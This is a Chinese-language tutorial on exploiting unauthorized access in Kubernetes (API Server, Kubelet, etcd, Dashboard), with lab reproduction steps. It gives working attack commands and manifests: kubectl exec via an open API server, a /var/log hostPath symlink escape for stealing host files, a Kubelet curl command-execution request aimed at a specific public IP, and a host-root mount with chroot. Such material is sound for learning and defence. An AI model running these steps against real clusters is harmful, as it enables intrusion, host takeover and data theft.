Kubernetes未授权访问漏洞及利用详解<\/h1>

一、Kubernetes未授权访问概述<\/h2>

Kubernetes (K8s) 环境中存在多种未授权访问风险，主要包括以下几种：<\/p>

API Server (默认端口8080\/6443)<\/li>
Kubelet (默认端口10250)<\/li>
etcd (默认端口2379)<\/li>

Dashboard面板泄露<\/li> <\/ol>

二、API Server未授权访问<\/h2>

1. 端口说明<\/h3>

8080端口<\/strong>：HTTP服务，默认无认证授权机制<\/li>

6443端口<\/strong>：HTTPS服务，支持认证(令牌或客户端证书)和授权服务<\/li> <\/ul>
默认情况下8080端口关闭，6443端口开启，配置位于\/etc\/kubernetes\/manifests\/kube-apiserver.yaml<\/code><\/p>
2. 漏洞复现<\/h3> 8080端口未授权<\/h4> 编辑配置文件开启8080端口：<\/li> <\/ol> vim \/etc\/kubernetes\/manifests\/kube-apiserver.yaml <\/span><\/span><\/code><\/pre> 重启K8s：<\/li> <\/ol> systemctl restart kubectl <\/span><\/span><\/code><\/pre> 访问8080端口即可发现未授权<\/li> <\/ol> 6443端口未授权<\/h4> 如果配置错误，将system:anonymous<\/code>用户绑定到cluster-admin<\/code>用户组：<\/p> kubectl create clusterrolebinding cluster-system-anonymous --clusterrole=<\/span>cluster-admin --user=<\/span>system:anonymous <\/span><\/span><\/code><\/pre>3. 利用方式<\/h3> 使用kubectl命令执行操作：<\/p> # 查看集群信息<\/span> <\/span><\/span>kubectl -s http:\/\/[<\/span>IP]<\/span>:8080 cluster-info <\/span><\/span> <\/span><\/span># 查看节点和pod信息<\/span> <\/span><\/span>kubectl -s http:\/\/[<\/span>IP]<\/span>:8080 get nodes <\/span><\/span>kubectl -s http:\/\/[<\/span>IP]<\/span>:8080 get pods <\/span><\/span> <\/span><\/span># 查看详细信息<\/span> <\/span><\/span>kubectl -s http:\/\/[<\/span>IP]<\/span>:8080 get nodes -o wide <\/span><\/span>kubectl -s http:\/\/[<\/span>IP]<\/span>:8080 get pods -o wide <\/span><\/span> <\/span><\/span># 进入pod执行命令<\/span> <\/span><\/span>kubectl -s http:\/\/[<\/span>IP]<\/span>:8080 exec -n default -it [<\/span>POD_NAME]<\/span> -- \/bin\/bash <\/span><\/span><\/code><\/pre>4. 容器逃逸技术<\/h3> 通过挂载\/var\/log<\/code>目录逃逸的原理：<\/p> 自定义服务账户<\/strong>：在Pod中指定自定义服务账户<\/li> 授予宿主机目录权限<\/strong>：使用ClusterRole和ClusterRoleBinding授权<\/li> 挂载宿主机目录<\/strong>：通过hostPath类型Volume挂载<\/li> 访问宿主机日志文件<\/strong>：通过挂载路径访问宿主机文件<\/li> 容器逃逸<\/strong>：实现从Pod到宿主机的逃逸<\/li> <\/ol> 关键概念<\/h4> RBAC<\/strong>：基于角色的访问控制 Role\/RoleBinding：命名空间内权限<\/li> ClusterRole\/ClusterRoleBinding：集群范围权限<\/li> <\/ul> <\/li> 服务账户(ServiceAccount)<\/strong>：Pod内部应用程序身份<\/li> 卷挂载(Volume Mounting)<\/strong>：将存储卷附加到Pod<\/li> <\/ul> 实验环境搭建<\/h4> git clone https:\/\/github.com\/Metarget\/metarget.git <\/span><\/span>cd metarget\/ <\/span><\/span>pip3 install -r requirements.txt <\/span><\/span>.\/metarget gadget install k8s --version 1.16.5 <\/span><\/span>.\/metarget cnv install mount-var-log <\/span><\/span><\/code><\/pre>手动创建Pod配置示例<\/h4> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: ServiceAccount<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: logger<\/span> <\/span><\/span> <\/span><\/span>--- <\/span><\/span>apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: ClusterRole<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: user-log-reader<\/span> <\/span><\/span>rules<\/span>: <\/span><\/span>- apiGroups<\/span>: [""<\/span>] <\/span><\/span> resources<\/span>: ["nodes\/log"<\/span>] <\/span><\/span> verbs<\/span>: ["get"<\/span>, "list"<\/span>, "watch"<\/span>] <\/span><\/span> <\/span><\/span>--- <\/span><\/span>apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span> <\/span><\/span>kind<\/span>: ClusterRoleBinding<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: user-log-reader<\/span> <\/span><\/span>roleRef<\/span>: <\/span><\/span> apiGroup<\/span>: rbac.authorization.k8s.io<\/span> <\/span><\/span> kind<\/span>: ClusterRole<\/span> <\/span><\/span> name<\/span>: user-log-reader<\/span> <\/span><\/span>subjects<\/span>: <\/span><\/span>- kind<\/span>: ServiceAccount<\/span> <\/span><\/span> name<\/span>: logger<\/span> <\/span><\/span> namespace<\/span>: default<\/span> <\/span><\/span> <\/span><\/span>--- <\/span><\/span>apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: escaper<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> serviceAccountName<\/span>: logger<\/span> <\/span><\/span> containers<\/span>: <\/span><\/span> - name<\/span>: escaper<\/span> <\/span><\/span> image<\/span>: danielsagi\/kube-pod-escape<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - name<\/span>: logs<\/span> <\/span><\/span> mountPath<\/span>: \/var\/log\/host<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: logs<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/var\/log\/<\/span> <\/span><\/span> type<\/span>: Directory<\/span> <\/span><\/span><\/code><\/pre>漏洞检测<\/h4> find \/ -name lastlog 2>\/dev\/null | wc -l | grep -q 3<\/span> &&<\/span> echo "\/var\/log is mounted."<\/span> ||<\/span> echo "\/var\/log is not mounted."<\/span> <\/span><\/span><\/code><\/pre>漏洞利用<\/h4> 进入容器：<\/li> <\/ol> kubectl get pods <\/span><\/span>kubectl exec --stdin --tty escaper -- \/bin\/bash <\/span><\/span><\/code><\/pre> 创建软链接：<\/li> <\/ol> cd \/var\/log\/host <\/span><\/span>ln -s \/ .\/root_link <\/span><\/span><\/code><\/pre> 使用脚本窃取敏感文件：<\/li> <\/ol> chmod 777<\/span> find_sensitive_files.py <\/span><\/span>python find_sensitive_files.py <\/span><\/span><\/code><\/pre>5. 判断是否处于K8s环境<\/h3> # 查看磁盘信息<\/span> <\/span><\/span>df -h <\/span><\/span> <\/span><\/span># 查看环境变量<\/span> <\/span><\/span>env <\/span><\/span><\/code><\/pre>三、Kubelet 10250端口未授权<\/h2> 1. 漏洞说明<\/h3> 10250是Kubelet默认端口，管理节点上的容器和Pod。默认配置中--anonymous-auth<\/code>为true时允许匿名访问。<\/p> 2. 漏洞复现<\/h3> 修改\/var\/lib\/kubelet\/config.yaml<\/code>配置错误后重启：<\/p> systemctl restart kubelet <\/span><\/span><\/code><\/pre>3. 利用方式<\/h3> curl -XPOST -k "https:\/\/<\/span>${<\/span>IP_ADDRESS}<\/span>:10250\/run\/<namespace>\/<pod>\/<container>"<\/span> -d "cmd=<command-to-run>"<\/span> <\/span><\/span><\/code><\/pre>参数获取方式：<\/p> namespace<\/li> pod<\/li> container<\/li> <\/ol> 示例：<\/p> curl -XPOST -k https:\/\/101.36.108.16:10250\/run\/kube-system\/kube-scheduler-10-7-181-56\/kube-scheduler -d "cmd=ls"<\/span> <\/span><\/span><\/code><\/pre>四、etcd 2379端口未授权<\/h2> 1. 漏洞说明<\/h3> 2379端口用于客户端与etcd通信，默认配置中本地127.0.0.1可免认证访问，其他地址需要认证。<\/p> 2. 利用限制<\/h3> 默认配置2379只监听127.0.0.1，实战中较少遇到。<\/p> 五、Dashboard面板泄露<\/h2> 1. 概念<\/h3> K8s Dashboard是基于Web的UI管理界面，提供集群资源管理功能。<\/p> 2. 安装部署<\/h3> wget https:\/\/raw.githubusercontent.com\/kubernetes\/dashboard\/v2.2.0\/aio\/deploy\/recommended.yaml <\/span><\/span>kubectl apply -f recommended.yaml <\/span><\/span><\/code><\/pre>3. 访问验证<\/h3> kubectl get pod -n kubernetes-dashboard <\/span><\/span>kubectl get svc -n kubernetes-dashboard <\/span><\/span><\/code><\/pre>4. 创建管理员角色<\/h3> dashboard-svc-account.yaml内容：<\/p> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: ServiceAccount<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: dashboard-admin<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span> <\/span><\/span>--- <\/span><\/span>kind<\/span>: ClusterRoleBinding<\/span> <\/span><\/span>apiVersion<\/span>: rbac.authorization.k8s.io\/v1<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: dashboard-admin<\/span> <\/span><\/span>subjects<\/span>: <\/span><\/span>- kind<\/span>: ServiceAccount<\/span> <\/span><\/span> name<\/span>: dashboard-admin<\/span> <\/span><\/span> namespace<\/span>: kube-system<\/span> <\/span><\/span>roleRef<\/span>: <\/span><\/span> kind<\/span>: ClusterRole<\/span> <\/span><\/span> name<\/span>: cluster-admin<\/span> <\/span><\/span> apiGroup<\/span>: rbac.authorization.k8s.io<\/span> <\/span><\/span><\/code><\/pre>应用配置：<\/p> kubectl apply -f dashboard-svc-account.yaml <\/span><\/span><\/code><\/pre>5. 获取token<\/h3> kubectl get secrets -n kube-system | grep dashboard-admin <\/span><\/span>kubectl describe secret dashboard-admin-token-wtl4c -n kube-system <\/span><\/span><\/code><\/pre>6. 通过Dashboard创建Pod并挂载宿主机根目录<\/h3> apiVersion<\/span>: v1<\/span> <\/span><\/span>kind<\/span>: Pod<\/span> <\/span><\/span>metadata<\/span>: <\/span><\/span> name<\/span>: myapp<\/span> <\/span><\/span>spec<\/span>: <\/span><\/span> containers<\/span>: <\/span><\/span> - image<\/span>: nginx<\/span> <\/span><\/span> name<\/span>: container<\/span> <\/span><\/span> volumeMounts<\/span>: <\/span><\/span> - mountPath<\/span>: \/mnt<\/span> <\/span><\/span> name<\/span>: test-volume<\/span> <\/span><\/span> volumes<\/span>: <\/span><\/span> - name<\/span>: test-volume<\/span> <\/span><\/span> hostPath<\/span>: <\/span><\/span> path<\/span>: \/<\/span> <\/span><\/span><\/code><\/pre>进入容器获取宿主机权限：<\/p> chroot \/mnt <\/span><\/span><\/code><\/pre>六、常见kubectl命令总结<\/h2> kubectl get pods # 查询Pod<\/span> <\/span><\/span>kubectl get pods -n namespace # 查询指定命名空间的Pod<\/span> <\/span><\/span>kubectl get pods --all-namespaces # 查询所有命名空间的Pod<\/span> <\/span><\/span>kubectl describe pod pod-name # 查询Pod详细信息<\/span> <\/span><\/span>kubectl get serviceaccount # 查询服务账户详情<\/span> <\/span><\/span>kubectl create serviceaccount account-name # 创建服务账户<\/span> <\/span><\/span>kubectl config view # 打印kubeconfig配置内容<\/span> <\/span><\/span>kubectl get rolebinding -n namespace # 查看rbac权限设置<\/span> <\/span><\/span>kubectl describe role role-name -n namespace # 查看角色绑定规则<\/span> <\/span><\/span>kubectl exec -it pod-name -c container-name -- \/bin\/bash # 进入容器<\/span> <\/span><\/span>kubectl cp pod-name:container-path local-path # 从容器复制文件<\/span> <\/span><\/span>kubectl get deployment # 查询Deployment信息<\/span> <\/span><\/span>kubectl scale deployment deployment-name --replicas=<\/span>3<\/span> # 扩缩容<\/span> <\/span><\/span>kubectl rollout restart deployment deployment-name # 重启Deployment<\/span> <\/span><\/span>kubectl apply -f file.yaml # 应用YAML配置<\/span> <\/span><\/span><\/code><\/pre>